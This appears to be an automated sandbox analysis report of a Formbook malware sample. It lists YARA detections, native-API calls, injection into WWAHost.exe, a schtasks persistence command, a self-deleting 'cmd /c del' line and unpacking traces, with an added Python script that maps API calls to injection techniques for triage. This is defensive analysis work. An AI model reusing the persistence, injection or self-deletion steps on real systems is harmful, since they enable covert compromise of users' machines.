Source: 0.2.456yqMyHvT.exe.42633b0.3.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.456yqMyHvT.exe.42633b0.3.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.456yqMyHvT.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.456yqMyHvT.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.456yqMyHvT.exe.4199f50.4.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.456yqMyHvT.exe.4199f50.4.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.923803050.0000000000E50000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.923803050.0000000000E50000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.924038169.0000000001160000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.924038169.0000000001160000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.797957782.0000000000D80000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.797957782.0000000000D80000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.797833968.0000000000D20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.797833968.0000000000D20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.923958720.0000000001010000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.923958720.0000000001010000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.704979180.0000000004131000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.704979180.0000000004131000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.706607375.00000000043B8000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.706607375.00000000043B8000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.758649360.000000000DA94000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_02FA2278
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_02FA1008
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_02FA3148
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_02FA0470
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_02FA1849
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_02FA52C8
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_02FA52B9
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_02FA40B8
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_02FA40AA
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_02FA3060
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_02FA56A0
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_02FA5468
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_02FA5458
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_02FA35F8
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_02FA5880
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_02FA2FFA
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_02FA0F57
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_05151B00
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_05151508
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_051514F8
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_0515473F
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_05154750
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_051521E0
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_05158333
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_05151AF0
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 7_2_00401030
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 7_2_0041D9B2
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 7_2_00402D8D
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 7_2_00402D90
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 7_2_0041D59A
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 7_2_0041D5A6
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 7_2_00409E60
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 7_2_00402FB0
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 7_2_0041DFB1
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C5EBB0
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C46E30
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C3D5E0
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C52581
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03CF1D55
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C2F900
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C20D20
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C44120
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C3B090
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03CE1002
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C3841F
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_00E6D5A6
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_00E52D8D
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_00E52D90
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_00E6D59A
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_00E59E60
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_00E6DFAF
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_00E52FB0
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: String function: 03C2B150 appears 32 times
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 7_2_0041A360 NtCreateFile,
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 7_2_0041A410 NtReadFile,
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 7_2_0041A490 NtClose,
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 7_2_0041A540 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 7_2_0041A35E NtCreateFile,
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 7_2_0041A40A NtReadFile,
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 7_2_0041A48A NtClose,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C69FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C69780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C69710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C696D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C69650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C69A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C69660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C695D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C69540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C69910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C69840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C69860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C697A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C6A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C69760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C69770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C6A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C69B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C6A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C69730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C69A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C69670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C69A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C69610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C69A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C69A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C699D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C695F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C69950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C69560 NtWriteFile,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C69520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C6AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C698F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C698A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C6B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C69820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_00E6A360 NtCreateFile,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_00E6A490 NtClose,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_00E6A410 NtReadFile,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_00E6A540 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_00E6A35E NtCreateFile,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_00E6A48A NtClose,
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_00E6A40A NtReadFile,
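The native-API call sites listed above are the raw material behind the report's process-hollowing, APC-queueing and section-mapping signatures: inside the injected WWAHost.exe the sample resolves NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread, NtResumeThread, NtQueueApcThread, NtOpenThread and NtCreateSection/NtMapViewOfSection, while the first stage only touches file and memory-allocation calls. The Python below is an added example, not Joe Sandbox code: it parses rows in the format above (a few of the WWAHost.exe and 456yqMyHvT.exe rows are embedded as constructed input), drops the LdrInitializeThunk resolution note, and reports which injection technique patterns each process image completes. The technique table is this example's own mapping, not the sandbox's rule set.

```python
"""Map sandbox-reported native-API call sites to injection technique patterns.

Added example for this report, not Joe Sandbox code. Input rows follow the
report's "Source: <image> Code function: <pid>_<stage>_<va> <calls>" format.
"""
import re
from collections import defaultdict

# Lazy <src> match tolerates both "exe Code function:" and the fused
# "exeCode function:" spelling seen in extracted copies of the report.
ROW_RE = re.compile(
    r"^Source:\s+(?P<src>.+?)\s*Code function:\s+(?P<id>\S+)(?:\s+(?P<calls>.*))?$"
)

# This example's own mapping from Nt* call sets to techniques. A pattern
# matches when every listed call is present somewhere in the process image.
TECHNIQUES = {
    "process hollowing": {
        "NtUnmapViewOfSection", "NtWriteVirtualMemory",
        "NtSetContextThread", "NtResumeThread",
    },
    "APC injection": {"NtOpenThread", "NtQueueApcThread"},
    "section mapping injection": {"NtCreateSection", "NtMapViewOfSection"},
}

# Constructed input: a subset of this report's rows.
SAMPLE_ROWS = r"""
Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 7_2_0041A360 NtCreateFile,
Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 7_2_0041A540 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C69780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C699A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C697A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C699D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C6A770 NtOpenThread,
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C69950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C6AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C698A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 15_2_03C69A20 NtResumeThread,
"""


def parse_rows(text):
    """Return {process image: set of Nt* names} from report rows.

    LdrInitializeThunk is the sandbox's note that the call was resolved via
    the loader thunk, not an API the sample targets, so it is dropped.
    """
    calls_by_image = defaultdict(set)
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        for name in (m.group("calls") or "").split(","):
            name = name.strip()
            if name.startswith("Nt"):
                calls_by_image[m.group("src")].add(name)
    return dict(calls_by_image)


def match_techniques(calls):
    """Names of technique patterns whose call set is fully covered by `calls`."""
    return sorted(name for name, needed in TECHNIQUES.items() if needed <= calls)


def triage(text):
    """Per image: the Nt* calls seen and the technique patterns they complete."""
    return {
        image: {"calls": sorted(calls), "techniques": match_techniques(calls)}
        for image, calls in parse_rows(text).items()
    }


if __name__ == "__main__":
    for image, info in triage(SAMPLE_ROWS).items():
        print(image, "->", ", ".join(info["techniques"]) or "no injection pattern")
```

Run against the rows above, the first-stage 456yqMyHvT.exe image completes no pattern, while WWAHost.exe completes all three; presence of a call set is only evidence of capability, and the sandbox's behavioural signatures (hollowing, APC queueing, thread-context modification) are what confirm the calls were actually used that way.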
          Source: 456yqMyHvT.exe Binary or memory string: OriginalFilename vs 456yqMyHvT.exe
          Source: 456yqMyHvT.exe, 00000000.00000002.709249473.0000000009E80000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameCF_Secretaria.dll< vs 456yqMyHvT.exe
          Source: 456yqMyHvT.exe, 00000000.00000003.675653422.0000000009F2E000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameDirectoryStri.exe4 vs 456yqMyHvT.exe
          Source: 456yqMyHvT.exe, 00000000.00000002.703199236.0000000003131000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameColladaLoader.dll4 vs 456yqMyHvT.exe
          Source: 456yqMyHvT.exe, 00000007.00000000.700922823.00000000007C0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDirectoryStri.exe4 vs 456yqMyHvT.exe
          Source: 456yqMyHvT.exe, 00000007.00000002.798568898.00000000013BF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 456yqMyHvT.exe
          Source: 456yqMyHvT.exe, 00000007.00000002.800667541.0000000003326000.00000040.00020000.sdmp Binary or memory string: OriginalFilenameWWAHost.exej% vs 456yqMyHvT.exe
          Source: 456yqMyHvT.exe Binary or memory string: OriginalFilenameDirectoryStri.exe4 vs 456yqMyHvT.exe
          Source: 456yqMyHvT.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: dWAzsHjHs.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\dWAzsHjHs.exe B25EF1151578640A5BB9E01FADA60A8792FC4D3E92F3DDABF19BA4CD6D630F57
          Source: 456yqMyHvT.exe Virustotal: Detection: 32%
          Source: 456yqMyHvT.exe ReversingLabs: Detection: 33%
          Source: C:\Users\user\Desktop\456yqMyHvT.exe File read: C:\Users\user\Desktop\456yqMyHvT.exe
          Source: 456yqMyHvT.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown Process created: C:\Users\user\Desktop\456yqMyHvT.exe 'C:\Users\user\Desktop\456yqMyHvT.exe'
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\dWAzsHjHs' /XML 'C:\Users\user\AppData\Local\Temp\tmp9071.tmp'
          Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Process created: C:\Users\user\Desktop\456yqMyHvT.exe C:\Users\user\Desktop\456yqMyHvT.exe
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
          Source: C:\Windows\SysWOW64\WWAHost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\456yqMyHvT.exe'
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\dWAzsHjHs' /XML 'C:\Users\user\AppData\Local\Temp\tmp9071.tmp'
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Process created: C:\Users\user\Desktop\456yqMyHvT.exe C:\Users\user\Desktop\456yqMyHvT.exe
          Source: C:\Windows\SysWOW64\WWAHost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\456yqMyHvT.exe'
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\456yqMyHvT.exe File created: C:\Users\user\AppData\Roaming\dWAzsHjHs.exe
          Source: C:\Users\user\Desktop\456yqMyHvT.exe File created: C:\Users\user\AppData\Local\Temp\tmp9071.tmp
          Source: classification engine Classification label: mal100.troj.evad.winEXE@10/4@2/1
          Source: C:\Users\user\Desktop\456yqMyHvT.exe File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3184:120:WilError_01
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Mutant created: \Sessions\1\BaseNamedObjects\TmFkYBWfQAulOG
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4692:120:WilError_01
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\456yqMyHvT.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: 456yqMyHvT.exe Static PE information: Virtual size of .text is bigger than: 0x100000
          Source: 456yqMyHvT.exe Static file information: File size 1205248 > 1048576
          Source: 456yqMyHvT.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 456yqMyHvT.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x10ca00
          Source: 456yqMyHvT.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: WWAHost.pdb source: 456yqMyHvT.exe, 00000007.00000002.800543926.0000000003270000.00000040.00020000.sdmp
          Source: Binary string: WWAHost.pdbUGP source: 456yqMyHvT.exe, 00000007.00000002.800543926.0000000003270000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: 456yqMyHvT.exe, 00000007.00000002.798568898.00000000013BF000.00000040.00000001.sdmp, WWAHost.exe, 0000000F.00000002.925469842.0000000003D1F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 456yqMyHvT.exe, 00000007.00000002.798568898.00000000013BF000.00000040.00000001.sdmp, WWAHost.exe

          Data Obfuscation:

          Detected unpacking (overwrites its own PE header)
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Unpacked PE file: 0.2.456yqMyHvT.exe.d20000.0.unpack
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Unpacked PE file: 0.2.456yqMyHvT.exe.d20000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_00D23CAA push ss; retf
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_00D23443 push ss; iretd
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_00D249F8 push eax; retf
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_00D263FF push eax; retf
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_00D249BA push D2F0D953h; ret
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_00D26D5D push esi; ret
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_00D23130 push eax; ret
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_02FA3309 push esp; iretd
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_02FA5E12 push esi; ret
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_02FA5E08 push esi; ret
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_0515A116 push edi; retf
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 0_2_0515BF75 push FFFFFF8Bh; iretd
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 7_2_0041C1D3 push esp; retf
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 7_2_0040627A push ds; iretd
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 7_2_0041D4B5 push eax; ret
          Source: C:\Users\user\Desktop\456yqMyHvT.exe Code function: 7_2_0041D56C push eax; ret
